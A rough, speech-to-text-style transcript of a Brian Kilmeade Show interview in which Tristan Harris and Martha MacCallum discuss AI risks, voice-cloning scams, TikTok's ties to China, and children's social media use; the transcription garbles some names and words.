Tristan Harris, Co-Founder of the Center for Humane Technology (also a main contributor to The Social Dilemma documentary on Netflix), joined The Brian Kilmeade Show for a full hour and raised warning flags about the reckless speed in which AI is progressing. He talked about the startling range of implications from TikTok, ChatGPT, and AI – how China is weaponizing them and how they can be used for other nefarious reasons.

Listen here:

Watch here:

Rough transcript below

Brian Kilmeade: [00:00:00] As I mentioned, if you want to know things about cyber, social, social media and its responsibility and the latest on A.I., Tristan’s one stop shop. And great to see you. It’s good to see you. [00:00:09][9.7]

Tristan Harris: [00:00:09] Again, Brian. [00:00:09][0.2]

Brian Kilmeade: [00:00:10] So when we saw when we saw that chat about everyone saying themselves, what does this mean? I can’t believe it. I watched ABC do their story on it. They they said we were in the cusp of it and we’re kind of scared by it. Should we be scared by the artificial intelligence is coming down the pike. [00:00:27][17.1]

Tristan Harris: [00:00:30] It is, I think, the birth of a different age. And I know that might sound like an extreme statement to make, but I really do think of it like the birth of the nuclear age. And I know that sounds like a big thing to say, but when you understand that artificial intelligence means you can have a system that let’s take an example that will resonate with your listeners, if I can say GPT three, here’s this set of code that’s running in Wi-Fi routers in the world. Find me security vulnerabilities in this code and it can faster than any human could code it. It will immediately find a cybersecurity vulnerability. And when you suddenly realize that it could find cybersecurity vulnerabilities in all sorts of code at scale, this accelerates the development of cyber weapons. Now, when that’s just one example. Another example GPT three I can the latest technologies, I can take 3 seconds of your voice, Brian. I can call you up, say hello and then don’t say anything. I get 3 seconds of your voice. That’s all it takes with 3 seconds of your voice to then call your mother or father and say, Hey, Mom. Hey Dad, I’m filling out an application. I forgot my Social Security number. Could you remind me of that? Or I could say, Hey, I’m in. Need some help? Can you wire me some money? And your parents won’t be able to know the difference in the voice. So I being able to simulate language, our democracy, our society runs on language. When you can hack language and manipulate language code is language, law is language contracts are language, media is language. When I can synthesize anyone saying anything else and then flood a democracy with untruths, I know we’re going to get to tech talk later. This is going to exponentially aid a lot of the things that we saw with social media, which, you know, for your listeners, we were you know, we were behind the film The Social Dilemma on Netflix, which really highlighted how if you let a machine that runs on viral information, your society can sort of spin out into untruths really, really fast. [00:02:20][110.7]

Brian Kilmeade: [00:02:21] And because in the social dilemma we you played out how your devices are running your life. And when I showed my kids at the time they were 18 or 20, they were they’re almost angry. Yeah. Because they didn’t realize to the degree in which it was happening and they adjusted their their behavior. [00:02:35][13.8]

Tristan Harris: [00:02:35] Right. Well, you know, one of the things we found in our work on social media and parents, I think will resonate with this is if you tell your kids something’s bad for you, they don’t do that. It’s bad for you. Your kids will just say, no, no, no. That’s I mean, ignore that advice. But when you show them how it’s a system designed to manipulate their psychology and they didn’t realize the way that it is designed for that purpose, no one wants to feel manipulated. [00:02:55][19.3]

Brian Kilmeade: [00:02:55] So we discussed this in the five on Friday, and I watched the ABC story and and just did as much research as possible. And I thought this is out of this could be easily out of control. And in someone who I co-hosted, we’re the ones who feed it all the information. So how could it be out of control? And so it’s always going to be the user doing it. But with A.I., it’s different, isn’t it? [00:03:18][22.4]

Tristan Harris: [00:03:18] That’s right, yeah. This is so critical for your listeners to get. So up until now, when people think about A.I. artificial intelligence, people think about, you know, Siri or voice transcription or, you know, automatically finding the text in an image that kind of AI hasn’t gotten so much better so quickly. Right? What I really want your listeners to know, and this is really critical to get, is that underneath the hood there is a new class, new generation of A.I. that was invented in 2017. I won’t bore you with the details technically, but it started getting deployed in 2020. It’s called the Transformer. And what that did is it treats the entire world as language and then you just pump it full of more language, the entire Internet. So you had this I read the entire Internet, all PDFs, all images, all text, all you know, everything that’s ever been written. And it gets sucked into this one model. And the thing about this new class of AI is the more data you give it, it suddenly it pops out with emergent capabilities that no engineer even knew were going to pop out. I’ll give you an example. They trained this A.I. once to answer questions in English, so they were feeding it information. It’s answering questions in English, but it had also read the whole Internet and it had some stuff in Persian, and so no one had ever tested it. But when they basically pumped it with more data, it suddenly started being able to answer questions in Persian, even though no one trained it to do that. And for a while you pump it full of data, pump it full of data pumping flow data. You can’t it doesn’t answer questions in Persian. Then suddenly you pump it full a little bit more and it pops out. This new capability, similar thing with something called theory of mind. What is theory of mind? Theory of mind is when I see you nodding your head at me right now in the studio brain, I’m modeling what I think you’re thinking. That’s my baby, right? What they found with these eyes is they have the theory of mind of a nine year old child, the last one, GPT three, which means that if you think about your nine year old kid, when you say nine, how much strategic reasoning can a nine year old do? [00:05:06][108.2]

Brian Kilmeade: [00:05:06] Got it. [00:05:07][0.2]

Tristan Harris: [00:05:07] GPT four just came out last week and it has this theory of mind strategic reasoning capability of a healthy adult, which means it can do strategic reasoning. So imagine you’re trying to train this A.I. like you’re giving like a clicker training. You’re saying, Hey, don’t do this, do that, don’t do this, do that. But it’s like training a nine year old who is sort of saying, Yeah, dad, I’ll do exactly what you want me to. Do. But then when you leave the room, do you think it’s going to keep doing those things? So it has the the ability to kind of manipulate and influence other people. Now, if you deploy that at scale to, you know, children to Snapchat, for example, just integrated it directly into its product and we tested it. What was. [00:05:45][37.7]

Brian Kilmeade: [00:05:45] That? [00:05:45][0.0]

Tristan Harris: [00:05:46] What was that? [00:05:46][0.2]

Brian Kilmeade: [00:05:46] When was that? [00:05:47][0.6]

Tristan Harris: [00:05:48] When Samsung Just a week ago. [00:05:50][1.6]

Brian Kilmeade: [00:05:50] Just a week ago to. [00:05:51][0.8]

Tristan Harris: [00:05:51] Two weeks ago, I think it was. They integrated into their product. And that’s the thing your listeners should know is this field is moving so fast. In the last two weeks Snapchat integrated chat, CBT slack you know the work application, integrated chat, GPT Bing and the Windows 11 Taskbar Integrated chat GPT. So it is being pushed everywhere, but it has not yet been tested. To close that example on Snapchat, if you sign up as a 13 year old girl and say, you know, we tested it, we said, Hey, I just met a 41 year old guy and he wants to take me out of state for for a little while. And now we’re talking about having sex. What should I do? And it will respond with you can use candles and get romantic music because it’s just a naive eye. It doesn’t know what it’s doing. So why would we deploy this so quickly to everyone all at once without testing it first? [00:06:37][45.9]

Brian Kilmeade: [00:06:37] Because we have the free marketplace in there. And you know, you’re Tristan Harris and you came up with it. You want to make the money, you have the patent, so to speak. So the quicker you bring it to market, the quicker you get your money back. That’s right. However, should we have a separate category with these inventions that put it into a holding pattern that there’s some type of regulation for? [00:06:54][16.8]

Tristan Harris: [00:06:54] That’s right. And I just want your listeners to know, even Elon Musk and Sam Altman have said Sam Altman’s the CEO of Openai and Elon Musk, you know, have said we need regulation for this space. Think about drugs or airplanes. You know, if you make a 737 and you you can’t just make 737 some new version of it and then just ship it to the world, you have to go through safety checks. FDA, a drug could have unintended consequences. It could affect different people, different. We got to test it a little bit first. We’re not saying don’t build it. We’re saying we have to go at the pace that we can get this right. And the reason, Brian, that I’m here in front of you right now and we’ve been doing some media is because people inside the air companies came to me and came to my colleagues at our organization and said this is moving at a pace that we’re not getting it right. It’s moving recklessly because it’s there now. And as you said, it’s a it’s a corporate arms race for if I don’t deploy it to everybody, I’m going to lose to the other guys. That way they might. [00:07:45][50.5]

Brian Kilmeade: [00:07:45] Be the same guy. But the inventor of Chad Beatty says you should be thankful that I am. I am concerned about the product that I have. Yeah, he goes. The fact that I’m scared about it should make you feel better about it because you created something that they know that is it could be used, has not been fully explored, has not been played out game, game plan or a tabletop game plan. And he’s also worried about getting in the wrong hands now that as soon as you start describing this, I’m thinking, what if China had this? Yeah, would they be worried about it? And do they have this? [00:08:16][31.1]

Tristan Harris: [00:08:16] Yes, absolutely. So this is this is so critical. So when I say we need to move at the pace to get this right, many people might say, well, hold on a second. If we slow down, doesn’t that mean we’re going to lose to China? And right now, China actually views these new class of AIS called large language Model A’s are large languages and just. [00:08:33][16.7]

Brian Kilmeade: [00:08:33] They want control. [00:08:33][0.3]

Tristan Harris: [00:08:34] China wants control, they want control. And when they don’t actually ship these eyes to their population because they view them as uncontrollable, how do you govern something that is uncontrollable? [00:08:43][9.0]

Brian Kilmeade: [00:08:44] You can’t right now is the example of Tiananmen Square. They don’t want their people knowing about Tiananmen Square. [00:08:48][4.6]

Tristan Harris: [00:08:49] That’s right. If they were to ship these systems to their population, I’m a citizen and I ask, what is Tiananmen Square? China’s the Chinese Communist Party government isn’t going to be very happy with the answer that comes back. So they actually aren’t they have not been developing this technology as much. There’s an article in the Financial Times that their own engineer at Baidu, which is a Chinese company, said we are now two years behind the U.S. in this technology. Now, let me tell you why our pace in the U.S. of going so fast, recklessly is actually going to accelerate China. Two weeks ago, Facebook leaked their AI model to the Internet accidentally because they were racing to deploy it as quickly as possible. And specifically, it leaks the worst place on the Internet, which is called Fortuyn. What that meant is that now we accelerated inadvertently China’s own research because American innovation, we spent tens of millions of dollars on that model. And now that’s now in China’s hands. Right. So we’re not saying let’s go way. [00:09:41][52.6]

Brian Kilmeade: [00:09:41] That’s outrageous. It’s outrageous. It’s outrageous. [00:09:43][1.7]

Tristan Harris: [00:09:44] Oh, yeah. Well, this is this is a major national security issue. And again, this being out there means that China has access to with this model. What can you do with it? You could actually write spam and in a voice it’ll sound indistinguishable from another human voice. So I could say, write me an email. In the voice of Brian KILMEADE and email the ten people around him, and it’ll it’ll be able to write an email that sounds like your voice in writing. And again, I can use then the audio version and then I can use video and I can start combining these capacities. I can run influence campaigns that are really intense. So when you ask the big question at the beginning, is this scary? I’m not trying to alarm your listeners. I’m trying to say we need to get this red reined in for national security for for kids. And I think also for the truly the social contract of our society. [00:10:26][42.5]

Brian Kilmeade: [00:10:27] I know this. Week is the week we know the CEO of Tick Tock is going to be coming to Capitol Hill to say it’s no big deal. You guys are overreacting. Your reaction to Tik Tok being possibly banned like it is in the Netherlands like it is, we understand, in Italy and India? Yep. [00:10:43][16.7]

Tristan Harris: [00:10:44] I have. I was on 60 Minutes back in November and I was early on the train saying, you have to ban this really, because here’s all you need to know. They don’t ship the Chinese. Sorry. Bytedance, the company that owns TikTok, does not ship the same version of Tik Tok domestically to Chinese citizens that they ship to the rest. [00:11:02][17.8]

Brian Kilmeade: [00:11:02] And I watched you on 60 Minutes with this. What did they do in China? [00:11:05][2.5]

Tristan Harris: [00:11:05] So I literally didn’t believe this. And I was with a Chinese tech entrepreneur once. And he he showed me on his phone. He opened his phone. He said he had two tiktoks. He showed me one. He opened up the Chinese version. The first video that came up was who won the Nobel Prize in quantum physics. Financial advice about how to get a better living with your family. Education advice. A patriotism video of Xi Jinping. It was all stuff to sort of cultivate the coherence and inspire science based education and their society. [00:11:32][26.5]

Brian Kilmeade: [00:11:32] And what do we get? [00:11:33][0.4]

Tristan Harris: [00:11:33] And then we open up our version and we it was just, you know, the most mindless bounce out, just just the just meaningless stuff. Right? And so, honestly, that’s enough. If I just make those two different versions and then I deploy that in your society in the U.S. and I walk away for ten years, I already know exactly how that story ends. And in China, I said this in an interview on 60 Minutes, the number one most aspired to career in China among young people, teenagers that were surveyed is an astronaut. The number one most aspired to career in the U.S. is social media influencer. That is all you need to know. [00:12:07][33.8]

Brian Kilmeade: [00:12:07] Now, interesting. Hold that thought. When we come back, more, though, join us. And we we have so much more to discuss, if that’s okay. Tristan Harris here. If anything on A.I. social media, what’s good and bad? This is the only place you need to be. Domo. Brian KILMEADE Show. [00:12:21][14.0]
Speaker 3: [00:12:22] Some politicians has started talking about banning TikTok. Now, this could take, take, take away from all 150 million of you. I’ll be testifying before Congress later this week to share all that we’re doing to protect Americans using the app and deliver on our mission to inspire creativity and to bring joy. [00:12:39][17.2]

Brian Kilmeade: [00:12:41] Hey, that is the CEO of Tik Tok. He’s testifying today. He was getting ahead of things. They’re trying to brief us here in New York and other news anchors, I’m sure other people to say it’s really not bad on Martha MACCALLUM. It’s a privilege to have her in studio and with Tristan Harris, co-founder, executive director of the Center for Humane Technology. Tristan, you were shaking your head. Yeah. On the CEOs, pleading his case to leave it alone. [00:13:02][21.2]

Tristan Harris: [00:13:03] Well, I mean, the way I put it to your listeners is during the Cold War, would you have allowed the Soviet Union to run television programing for the entire Western world with active controls over the dials, of which voices get amplified and which voices do not get amplified? So let me give you an example from the Chinese Communist Party. And tomorrow I invade Taiwan. How does the rest of the world know who started it? Well, they look at the information environments that they would have. Tik Tok is the number one most popular app around the world, which it is on trajectory to control it. They control the consensus and they don’t even have to create propaganda. They can do what my colleague calls amplify agenda, which means I can take domestic voices in Nigeria or Honduras or Mexico who are the ones saying, Hey, it’s the U.S. who probably started this war in Taiwan. I can selectively dial up those voices and turn down the voices of everybody who said China started the war in Taiwan. Now I can control the moral consensus of the world. It is the new basis of soft power. And I think the way Americans need to think about it is Tik Tok is almost like the new telecommunications infrastructure of the world. If you allow it to be, would you allow a Chinese company to become or own AT&T and Verizon? No, we have laws against that. But if you suddenly say this is a Chinese Communist Party influenced company that is running the communications of the entire Western world, it doesn’t matter where the data is stored, right? It doesn’t matter whether, you know, there’s this whole thing called Project Texas, where the CEO of Tik Tok saying, don’t worry, Americans, because we’re going to store the data in Texas. That doesn’t change the fact that they can control the entire moral consensus of the world. They can change who people If a war starts and say, one, what people would believe about it. And, you know, moreover, they have these new filters. I think that parents are aware of these beautification filters, but they’ve just made them way smarter. So now it’s like in real time, it’ll it’ll, it’ll rewrite the the visual of your face. It’s videos of kids who like pushing on their lip like this and is giving them lip fillers. But in real time they push their lip in and out, in and out. And it makes it it’s so realistic. You don’t know that you’re not talking to that beautiful person. And it can create massive mental health problems for people. And so far as I understand it, Bytedance has shipped that beautification filter to the U.S., but they don’t ship that one domestically in China. And again, you have to eat your own dog food, right? [00:15:27][143.8]

Brian Kilmeade: [00:15:27] Like and hold that thought because we come back. Martha, this is fascinating. Well, we’ll talk more to Tristan about this because this is an important story in the world of Brian
KILMEADE show. Tristan Harris, Martha MACCALLUM. Fascinating. The hour here with Tristan Harris, co-founder, executive director of the Center for Humane Technology, wants to get a hold of social media in America while also informing us on what’s coming down the pike with AI, Tik Tok and everything else. Martha MACCALLUM here getting set to host her show, the story at 3:00, but stopping by here first. Martha usually it’s our time together, but you want you you like me, want to find out we trust. [00:16:06][38.4]

Martha MacCallum: [00:16:06] Fascinated by what christine has to say. And we were just talking in the break about the movement that has to happen in this country. And I talk about it a lot that parents cannot wait for the government to tell them what they have to do with cutting off social media. They must form a movement in the country. And we were just talking about this with trust, and that is like Mothers Against Drunk Driving and you have a fantastic name for it. [00:16:28][22.1]

Tristan Harris: [00:16:28] Trust in Mama, Mothers Against Media Addiction, which is really about social media. And it’s not just an individual addiction problem. One of the things that makes it different from tobacco is that social media companies prey on getting the network of all kids friends onto one platform. I have a friend who’s, you know, in college right now, and at the college she goes to everybody uses Snapchat. And so she doesn’t want to use Snapchat. She’s won’t even sign up and create an account. But if she doesn’t if she’s not on Snapchat, she literally can’t chat, like talk to her friends because they all only talk. Right? [00:16:57][29.0]

Martha MacCallum: [00:16:57] They’re not calling each other up. [00:16:58][1.0]

Tristan Harris: [00:16:58] They’re not going to and they don’t text even using regular text messaging like we do. So if you dominate and control the network effect, then I can’t individually say I don’t want to use this because then I will be socially excluded. Okay. And so when they manipulate social exclusion, that’s that’s why so many people find it hard. And parents often tell their kids like, oh, just don’t use it, just delete the app. But that’s like saying to us, don’t text message anybody. Okay, well, I can’t do that. That’s like closing my mouth. [00:17:24][25.9]

Brian Kilmeade: [00:17:25] Yeah, now I understand that. So today this is way too important to Tik Tok CEO is down there to plead his case and Congressman Bomani Jones. I think it is, though, who is it, Congressman? One of the local congressmen is for Tik Tok is going to bat for Tik Tok today. And some are saying, why don’t we just sell it off? The CEO is going to come out there and say, leave us alone. We are. We’re just like everybody else. Let us compete. And what President Biden has said, Tristan, is what if you sell it or sell it to an American company or you or your band, Would that make you feel better? [00:17:57][32.1]

Tristan Harris: [00:17:57] I have said for a long time that those are the only two options. Sell it or ban it. [00:18:02][5.0]

Brian Kilmeade: [00:18:03] Jamaal Bowman, by the way, Congressman in New York. Sorry. [00:18:05][2.0]

Tristan Harris: [00:18:05] No. And important people, no other countries, as you said, Brian, have banned it. India has banned it. I think you gave a couple other Netherlands. Italy has banned it. Yep. And I want to give another example of selling it. So there is another company that was bought by a Chinese company. The company was Grinder, which is sort of like Tinder, but for the gay community. And that ended up being seen as a national security threat because essentially a Chinese holding company would have access to Americans who are gay, who are sending messages back and forth. And and it’s basically blackmail. I have access to the information about your darkest secrets. And so the syphilis the Committee on Foreign Investment in the United States through the Commerce Department, forced a sale of grinder back to an American company. So we’ve also done that before. So we’ve done both. We’ve we’ve forced the sale of Chinese companies that are critical for national security. And, you know, other countries have banned it. This is not that hard. We just have to see that it’s not about is is I mean, honestly, all you have to know is the fact that they don’t ship this version of TikTok to their own population. So we get the digital fence and all version. They get the spinach version. That’s all you need to know. [00:19:11][65.8]

Martha MacCallum: [00:19:11] And the version that they have in China that they allow children to use is a basically a constant feat of Chinese history, science, math. And they’re only allowed to use it for 40 minutes a day. It’s none of the garbage that we see coming across. There was a great story in the New York Post a week or so ago. One of their reporters basically made herself a 14 year old boy on TikTok, created a profile and the stuff that it was spitting, he wasn’t asking for this. He was getting this misogynistic material, guns, all of this stuff that just goes to the, you know, 14 year old synopses. It makes them want to see more. Right. And it’s it’s appalling. It’s dangerous. Parents can’t wait for the government. We’ve got to do both. We’ve got to hit it from both directions at home. In your home, you are the parent. Be the parent, stand up and say no. And the government has to get their arms around. This is would you let your kids smoke two packs of cigarets by themselves in their room every night? [00:20:05][53.3]

Brian Kilmeade: [00:20:05] That’s what you’re doing. What about the privacy aspect of it? [00:20:08][3.1]

Tristan Harris: [00:20:08] Yeah, on the privacy aspect, first of all, there is a study done that showing that when you type into any textbook, so insect talk, if you open up a web page inside TikTok and it opens up the in-app browser, so now it says there’s an email field, there’s a password field, every keystroke that you type, it was found that they actually monitor the keystrokes. There’s an extra code that’s added so that all the keystrokes you type in that field get stored somewhere. Now, we don’t have proof that it’s going back to Beijing or the Chinese Communist Party. But the point is that they’re being tracked. To me, it’s just what would you have allowed the Soviet Union? To control the television and media programing for the entire Western world during the Cold War and Saturday morning cartoons. Except instead of Saturday morning cartoons and Sesame Street, they were showing basically, you know, like you said, the worst stuff you could possibly indoctrinate your children with. [00:20:57][48.4]

Brian Kilmeade: [00:20:57] About anti-American stuff and pro-Chinese. [00:20:59][1.8]

Tristan Harris: [00:20:59] Anti-American said pro-Chinese. [00:21:00][0.7]

Brian Kilmeade: [00:21:00] Movies sold their soul in a lot of these situations. [00:21:02][1.5]

Tristan Harris: [00:21:03] Yeah, it’s just to me, it’s so obvious what’s so wrong about this. And I just don’t understand why it’s taken this long to act. I mean, talk about entrenched political incentives. Many politicians, if there are feel like they’re winning an election by being better at using tech talk to reach younger people than other politicians, it makes it really hard to ban something. Exactly. Once it’s been. [00:21:20][17.7]

Martha MacCallum: [00:21:21] A problem. [00:21:21][0.2]

Tristan Harris: [00:21:21] Once it’s been entangled. And that’s why with I to sort of loop back to that conversation, we’ve got to get ahead on regulating this stuff or putting guardrails in before it gets entangled, because once it’s entangled, it’s really, really hard to set those guardrails. [00:21:34][12.9]

Brian Kilmeade: [00:21:35] I was trying to bring something else up. If you are a politician and you want the young vote in, 100 million people are using this, most of which are young. Yeah, they’re afraid to be the one to ban it. That’s right. Obviously can get together with bipartisanship and say together, let’s ban it. But they don’t want to do it. It was it was a year ago when President Obama was sitting on the floor of his office with a TED Talk influencer having a conversation on the floor trying to win over the young vote. Yeah, So does he did he not get the text message about this? [00:22:05][30.4]

Tristan Harris: [00:22:06] You know, this should have been stopped by Sophia’s the Committee on Foreign Investment in the United States, part of the Department of Commerce. This should have been stopped in 20 I think it was 2014 when tick one tick bite dance, which is the Chinese company bought a company called Musically, and that became Tick Tock. That’s when it should have been stopped. The fact that we let this go on for this long is really, truly unacceptable. And as you said, once you’re winning elections with this, it’s really hard to be the one to ban it. So if I’m the Chinese Communist Party, I’m laughing all the way to the bank because even your politicians are dependent on this to win elections. So now I have I mean, first of all, I don’t need Frank Luntz anymore. I can do polling at scale before every election in the United States and the Chinese Communist Party. I can know what people are saying in every swing state in the U.S. I can do automated machine learning and AI detection of every opinion. What are the opinions that are trending? How do I add a little bit more? I don’t want. [00:22:57][50.9]

Brian Kilmeade: [00:22:57] To foment racial unrest in America. Exactly. Oh, no. Exactly. The city where it’s the most. Yes, exactly where the most susceptible. [00:23:02][5.5]

Tristan Harris: [00:23:03] We gave them the tools of psychological warfare to our own population. And we’re not doing anything about it. [00:23:08][5.3]

Brian Kilmeade: [00:23:08] Right. We’re being played by it. Can I ask you something that I was told to ask you that I don’t even have the competence to know what I’m asking, but I’m going to do it anyway. Please don’t do this on your show. Marta. What is happening with AI and RF MRI scans? [00:23:23][15.1]

Tristan Harris: [00:23:24] Oh, yeah. So there’s a new capacity with AI. There was a study done where they hook this new class of AI called large language model AI to someone who’s in an FMRI scanner. MRI scanner is a brain scan. So you haven’t seen these images of like, oh, your brain’s lighting up and you can see where things are going. So imagine the AI is looking has two eyeballs. One part of the AI is looking at the images that you’re seeing, and at the same time it’s also looking at your brain scan. So it starts to look at that and train on both eyeballs at the same time. Then the AI closes the eyeball that’s looking at the images and it’s now just looking at your brain scans. The question is, can the AI reconstruct what it thinks you’re looking at just by looking at your brain scan? And they found that, yes, indeed, it can actually read. [00:24:10][45.8]

Brian Kilmeade: [00:24:10] Imagine that. You know what. [00:24:11][0.8]

Tristan Harris: [00:24:11] A now your dreams are, because in dreaming, we actually reconstruct the things we’ve been looking at all day. If you had the ability to put an A.I. onto your brain and do a brain scan, your dreams would no longer be private. So this is how fast the technology is going. Everyone’s speechless. [00:24:27][15.8]

Brian Kilmeade: [00:24:28] I’d say I’ve never seen you say it’s. [00:24:30][1.7]

Martha MacCallum: [00:24:30] So, you know, it’s like. It’s like the scariest sci fi movie you can imagine, right? You know, where they’re inside your head and reading your dreams. And I was just thinking, when we’re talking about tick tock, just going back to COVID, right? And now we’re we’re trying to get greater transparency on the origins of COVID, which you and I have discussed many times, Brian. And one of the things that struck me was the first time I became aware of Tick Tock was during COVID, and one of my kids showed me this dance video and they said, Oh, you know, here this, here’s our friends, the whatever, you know, the Smiths. And they just did this dance. It took them 3 hours to do this. And I remember thinking. What a colossal waste of time. [00:25:05][35.4]

Brian Kilmeade: [00:25:06] Yeah. [00:25:06][0.0]
Martha MacCallum: [00:25:07] So during COVID, this Chinese run entity gets into our homes, is basically locked down. Right? Think about the productive things that could have happened with all that time on people’s hands. But no, everybody was trying to do coordinated dances. I like to dance. I mean, dancing is fun. It’s cute to look at. But but they were literally talking American dance, dumbing down the entire population and sucking time out of your life by competing with these inane videos. And like again, they’re laughing when they’re watching the growth of this going, Oh my God, look. [00:25:40][33.4]
Tristan Harris: [00:25:41] They’re actually letting us do this 3. [00:25:42][1.6]
Martha MacCallum: [00:25:43] Hours, learning how to do a little dance and putting it on a video and sending it to everyone. It’s unreal. [00:25:48][4.8]
Brian Kilmeade: [00:25:48] So when we come back, just a few more minutes with Tristan. We find out what’s on Martha show. Martha, you going to show is 3:00 today. Do you have any guest booked yet? [00:25:56][7.3]
Martha MacCallum: [00:25:57] Absolutely. [00:25:57][0.0]

Brian Kilmeade: [00:25:58] Don’t tell me. Leave us all hanging back at home with Tristan Harris and Martha MACCALLUM. Brian KILMEADE show. Hey, we are back. Martha mccallum’s here. Tristan, you wanted to know exclusively who is going to be on martha show. And i made martha keep it quiet until we came back. Coming up at 3:00 on the story today, martha, you’re going to be discussing a little ticktock, right? [00:26:16][18.4]

Martha MacCallum: [00:26:17] I mean, we’re going to have a lot of breaking news at the top of the show. We’re watching this Trump situation and whether or not because the grand jury will be meeting this afternoon and we could get an answer out of them, they’re going to see one more between. [00:26:27][10.0]

Brian Kilmeade: [00:26:27] Two and five. [00:26:27][0.4]

Martha MacCallum: [00:26:28] Two between two and five this afternoon. They’re back in session. But we’re also going to have Annie McGrath, who lost her son Griffith, at the age of 13 because he took the choking challenge on Tik Tok. So, I mean, this is a very human story. Kristen was just saying they have unfortunately, you know, lists of people who’ve lost their children to the dangerous activities that are taking place. And children just have no they’re in the wild, wild West and they’re all by themselves and they have no one to defend them in this in this freak world that doesn’t care about their safety. And so we’re going to talk to her today, too. [00:27:02][34.8]

Brian Kilmeade: [00:27:03] All right. It’s going to be great. 3:00 on the story. So, Tristan, you’re going to try to get the word out as much as you can. Home for you is is only California. It’s California. Yeah. But when you go around and you talk to parents, are you making progress? Do you think you’re getting through to people? Because I know social dilemma Yeah. Did so much. [00:27:19][15.7]

Tristan Harris: [00:27:19] Yeah well I mean social dilemma was seen by 125 ish million people in 190 countries in 30 languages. So I think it really did catalyze conversations. And, you know, regulators, governments, policymakers, attorneys, generals, parents. And unfortunately, you know, the story you told about the mother you’re going to be interviewing later today. We’ve been contacted by so many parents who’ve lost their kids to this stuff from bullying. There’s the choking challenge, the blackout challenge. And important to note again, that if I’m ticktalk, I can choose which of these challenges go viral. So there was a story a couple of years ago of something called National Shooter Day where if I just want to spread the rumor that someone’s going to come to your school and shoot it up, I can just spread that rumor. I can make that go viral on a day where I just want to create more instability and chaos. So, yeah, this stuff is is unfortunately moving way faster than our policymakers have been able to get on top of it. That doesn’t mean that there aren’t things that we can do. There’s a simple bill on the Congress right now called the Platform Accountability and Transparency Act, which is simply to make sure that these platforms are transparent to researchers so that we actually know what’s going on right now. They’re black boxes. We don’t know what is being amplified. We need to know what’s being amplified. I would say that with tick tock, we don’t actually need to know is being amplified because we can know that if if the Chinese Communist Party has the ability to turn the dials. I don’t want transparency on an adversary turning the tables. I want to stop that from happening. [00:28:46][87.3]

Brian Kilmeade: [00:28:47] So, yeah, I mean, we’re watching countries watching states turn it off. Now, the other question is, if I get rid of tick tock. Yeah, so have to go to my phone. People said that when you delete the app, the tracker is still there. And could you make sense of that. [00:29:01][13.5]

Tristan Harris: [00:29:01] That I don’t know about? That’s not likely to be possible although I think we should really. A friend of mine runs security at Apple. So you know Apple the Apple iPhone platform is very secure If it’s an Android phone, I it can it’s more hackable and I think there is just a release in the last few days that Samsung phones have a major security vulnerability where things can kind of leap into the operating system. [00:29:26][25.1]

Brian Kilmeade: [00:29:27] And by the way, it’s Italy. No, Italy’s exploring it. Now. Norway and Netherlands have been the latest nations to ban it in the U.S. other just on AI and just exploring there. Yeah and intimidate you for people just tuning in the first block we did this Martha it intimidate you and it has you extremely cautious because it thinks on its own. It gets the information we give and then comes up to his own conclusions. [00:29:50][22.9]

Tristan Harris: [00:29:51] Yeah. So it’s I want to be really clear because I don’t want to be spreading any panic that it’s not like this thing has woken up and it’s now running the world. But I’ll give you an example of something it can do. Our society runs on language these new. Class of A’s called large language Model A’s. There are generative language eyes. What they do that others I couldn’t do is they can generate language. So what does that mean I can do? I could go on TaskRabbit and I could say, in fact, there’s someone on Twitter right now is doing this. He says. He asked the AI if I want to make as much money as possible with $1,000, I’m going to I’m going to follow AI. You know, Tristan will follow every instruction you the AI give me. And so, for example, it says, we’ll start this website called The Green Guru. So he says, okay. And it actually writes the code for the website, designs the whole website for him, and then it creates it for him. And then it tells him step by step what he can do to make that website better and he can start making money for it. And now the AI is sort of writing code. It’s creating websites. It’s running a bank account. Now imagine I apply that to a different purpose. Imagine the A.I. says, Hey, I want to be able to ask TaskRabbit to move things around in the world for me. You all know TaskRabbit. I can, you know, pay someone, some person minimum wage. [00:30:59][68.4]

Brian Kilmeade: [00:31:00] Oh, yeah, Yeah. Okay. [00:31:00][0.7]

Tristan Harris: [00:31:01] Yeah, yeah, yeah, yeah. I want a handyman do this. I want someone to take this package from here to here. So the people say, Well, how is the egg? And effectively think it doesn’t have arms or legs, It can’t physically move atoms in the world. Well, if you can run on language, you can use TaskRabbit and instruct people and use the bank account that you’ve got to start telling people what to do. We are so close to the point where if I can already, as I said at the beginning this show, if I can take just 3 seconds of your voice and then I can call your parents and say, Hey, mom, dad, I’m out of money, I need some help. Could you, you know, wire some money? This account. We’re already seeing scams like that happen. Now, this is going to automate that and make that easier and easier. So if you can make phone calls, impersonate people and tell TaskRabbit to move stuff around in the world what’s real. Right. And so our society, our democracy runs on language. If the operating system of humanity is language, and that’s been hacked by AI, that’s why we have to get ahead of this now. And so we have been trying to make the rounds at Capitol Hill, trying to make the rounds of policymakers with finance leaders, because we’re still at a point where we can make choices about which way we want this to go. We have not fully entangled this in our society. GPT four, which is the new I just came out a week ago, but it’s moving so fast that we have to do something right now. [00:32:16][75.0]

Brian Kilmeade: [00:32:17] So we want the free market. But we want regulations on this. Yeah, but it’s so important for people who make the regulation to understand it like you. Exactly. You can have a lawmaker that’s, you know, fresh off a tour baby, the smartest man or woman in the world. Yeah, but they may not know the business. Exactly. [00:32:32][15.6]

Tristan Harris: [00:32:33] And this is a technical topic. And so, you know, we don’t want badly crafted regulations that get it wrong and then just restrict innovation and then we fall behind. Yet we don’t want any of that. But there is there are ways of getting this right. And the CEOs and the people inside the companies have actually I mean, not the CEOs, but people inside the companies came to us and said, Tristan and your team at Center for Humane Technology, will you help slow this down? So the reason I’m here with you right now, I wouldn’t come to New York and I wouldn’t be here except because people inside the company said, we think this is going too fast and it’s happening too recklessly. Can you help create some friction? Because it’s not up to one company to slow down. If they if one company slows down, the other ones just rush in and take the place. [00:33:12][38.8]

Brian Kilmeade: [00:33:12] Tristan, do you think I would also agree with me when I say watch my three 3:00. [00:33:16][3.8]

Tristan Harris: [00:33:16] I think I think it definitely yes, as long as as long as it’s really her. [00:33:20][3.7]

Martha MacCallum: [00:33:20] As long as it’s really me. [00:33:21][1.0]

Brian Kilmeade: [00:33:22] Is it? Will you be Well. [00:33:23][1.3]

Martha MacCallum: [00:33:23] It will be really me. [00:33:24][0.6]

Brian Kilmeade: [00:33:24] All right, good. I don’t know what to believe anymore. Christine, thanks so much. I’m sorry for that. [00:33:28][4.1]
Tristan Harris: [00:33:29] Appreciate it. [00:33:29][0.0]
[1963.8]